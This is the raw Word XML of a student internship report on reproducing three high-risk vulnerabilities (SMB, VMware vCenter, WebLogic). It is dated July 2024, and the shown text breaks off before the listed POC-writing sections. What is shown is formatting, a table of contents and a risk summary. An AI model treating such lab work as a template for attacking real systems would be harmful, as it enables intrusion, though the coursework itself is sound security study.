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cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>南开大学</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>实习实训漏洞复现报告</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w: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0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:ind w:firstLine="0" w:firstLineChars="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/>
    <w:p/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480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>02</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>4年7月25日</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:id w:val="147463564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/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p>
          <w:pPr>
            <w:jc w:val="center"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              <w:sz w:val="21"/>
            </w:rPr>
            <w:t>目录</w:t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eastAsia" w:cstheme="majorEastAsia"/>
              <w:bCs/>
              <w:sz w:val="36"/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
              <w:bCs/>
              <w:sz w:val="36"/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:instrText xml:space="preserve">TOC \o "1-3" \h \u </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
              <w:bCs/>
              <w:sz w:val="36"/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> HYPERLINK \l "_Toc21559" </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>1.漏洞复现结论（</w:t>
          </w:r>
          <w:r>
            <w:t>1</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>5分）</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc21559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"_Toc11151" </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>1.1</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>风险等级分布</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc11151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"_Toc10157" </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>2.工作计划（25分）</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc10157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"_Toc18262" </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>2.2</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>漏洞对象</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc18262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"_Toc7422" </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>2.1</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>工作人员</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc7422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"_Toc27662" </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>2.3</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>漏洞复现阶段</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc27662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"_Toc1270" </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>2.4风险等级</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc1270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"_Toc1379" </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>3.漏洞复现过程（</w:t>
          </w:r>
          <w:r>
            <w:t>3</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>5分）</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc1379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"_Toc19034" </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>3.1 风险管理及规避</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc19034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"_Toc29103" </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>3.</w:t>
          </w:r>
          <w:r>
            <w:t>2</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>测试方法</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc29103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"_Toc32313" </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>3.2.1 CVE-2020-0976</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc32313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"_Toc24942" </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>3.2.2 CVE-2021-21972</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc24942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"_Toc11268" </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>3.2.3 CVE-2020-2883</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc11268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"_Toc916" </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t xml:space="preserve">4. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>漏洞复现结果（25分）</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc916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"_Toc23321" </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>4.1 SMB远程代码执行漏洞</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc23321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"_Toc27993" </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:bCs/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>4.1.1 POC插件编写</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc27993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"_Toc4576" </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:bCs/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>4.1.2 漏洞信息</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc4576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"_Toc24933" </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>4.2 VMWare vCenter Server 远程代码执行漏洞</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc24933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"_Toc3767" </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>4.2.1 POC插件编写</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc3767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"_Toc31124" </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>4.2.2 漏洞信息</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc31124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  <w:ind w:left="480"/>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> HYPERLINK \l "_Toc19761" </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>4.3 Weblogic Server 代码执行漏洞</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc19761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"_Toc4010" </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>4.3.1 POC插件编写</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc4010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  <w:ind w:left="960"/>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> HYPERLINK \l "_Toc25218" </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>4.3.2 漏洞信息</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc25218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r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/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spacing w:before="312" w:after="312"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc14593"/>
      <w:bookmarkStart w:id="1" w:name="_Toc32228"/>
      <w:bookmarkStart w:id="2" w:name="_Toc21559"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.漏洞复现结论</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5分）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="400" w:lineRule="exact"/>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>南开大学实习实训第八小组的安全人员采用科学的漏洞复现步骤于2024年7月19日至2024年7月25日对cve漏洞进行了全面深入的漏洞复现。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:cs="华文仿宋"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cs="华文仿宋"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>本次共发现漏洞3个，其高危漏洞3个，中危漏洞0个,低危漏洞0个。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="1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0"/>
        <w:gridCol w:w="4705"/>
        <w:gridCol w:w="2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598" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="7"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts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3" w:name="_Hlk482954515"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"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序号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4709" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="7"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts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漏洞名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2215" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="7"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts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Times New Roman" w:hAnsi="Times New Roman" w:cs="宋体"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1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风险值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598" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="21"/>
              <w:spacing w:after="120"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:jc w:val="center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4709" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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</w:rPr>
              <w:t>SMB远程代码执行漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2215" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="center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高危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598" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="21"/>
              <w:spacing w:after="120"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:jc w:val="center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4709" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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VMware vCenter Server远程代码执行漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2215" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:ind w:firstLine="720" w:firstLineChars="300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高危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598" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="21"/>
              <w:spacing w:after="120"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:jc w:val="center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bookmarkStart w:id="4" w:name="_Toc5011"/>
            <w:bookmarkStart w:id="5" w:name="_Toc16656"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"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4709" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="center"/>
              <w:rPr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Weblogic 反序列化</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2215" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="156"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="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高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="3"/>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc11151"/>
      <w:r>
        <w:t>1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>风险等级分布</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本次评估漏洞的详细风险等级分布如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等级评估来自NVD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cve-2020-0796</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5258435" cy="1059180"/>
            <wp:effectExtent l="0" t="0" r="12065" b="7620"/>
            <wp:docPr id="5" name="图片 5" descr="屏幕截图 2024-07-19 12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07-19 1214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04315"/>
            <wp:effectExtent l="0" t="0" r="5080" b="6985"/>
            <wp:docPr id="6" name="图片 6" descr="屏幕截图 2024-07-19 12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7-19 1214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895" cy="2744470"/>
            <wp:effectExtent l="0" t="0" r="1905" b="11430"/>
            <wp:docPr id="7" name="图片 7" descr="屏幕截图 2024-07-19 12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7-19 1214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Cve-2021-21972</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5259070" cy="927735"/>
            <wp:effectExtent l="0" t="0" r="11430" b="12065"/>
            <wp:docPr id="8" name="图片 8" descr="屏幕截图 2024-07-19 12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7-19 1221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40180"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="9" name="图片 9" descr="屏幕截图 2024-07-19 12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7-19 1221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772410"/>
            <wp:effectExtent l="0" t="0" r="11430" b="8890"/>
            <wp:docPr id="10" name="图片 10" descr="屏幕截图 2024-07-19 1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7-19 1221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Cve-2020-2883</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266055" cy="2169795"/>
            <wp:effectExtent l="0" t="0" r="4445" b="1905"/>
            <wp:docPr id="22" name="图片 22" descr="屏幕截图 2024-07-24 13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07-24 1355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483995"/>
            <wp:effectExtent l="0" t="0" r="10795" b="1905"/>
            <wp:docPr id="30" name="图片 30" descr="屏幕截图 2024-07-24 135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4-07-24 1355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59070" cy="2743835"/>
            <wp:effectExtent l="0" t="0" r="11430" b="12065"/>
            <wp:docPr id="47" name="图片 47" descr="屏幕截图 2024-07-24 13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4-07-24 1356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12" w:after="312"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc32430"/>
      <w:bookmarkStart w:id="8" w:name="_Toc8277"/>
      <w:bookmarkStart w:id="9" w:name="_Toc10157"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.工作计划</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（25分）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc7422"/>
      <w:bookmarkStart w:id="11" w:name="_Toc18262"/>
      <w:bookmarkStart w:id="12" w:name="_Toc18367"/>
      <w:bookmarkStart w:id="13" w:name="_Toc19764"/>
      <w:bookmarkStart w:id="14" w:name="_Toc10156"/>
      <w:bookmarkStart w:id="15" w:name="_Toc21093"/>
      <w:r>
        <w:t>2.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工作人员</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="15"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1974" w:tblpY="256"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="817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2"/>
        <w:gridCol w:w="1722"/>
        <w:gridCol w:w="1138"/>
        <w:gridCol w:w="450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7" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="80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序号</w:t>
            </w:r>
          </w:p>
        </w:tc>
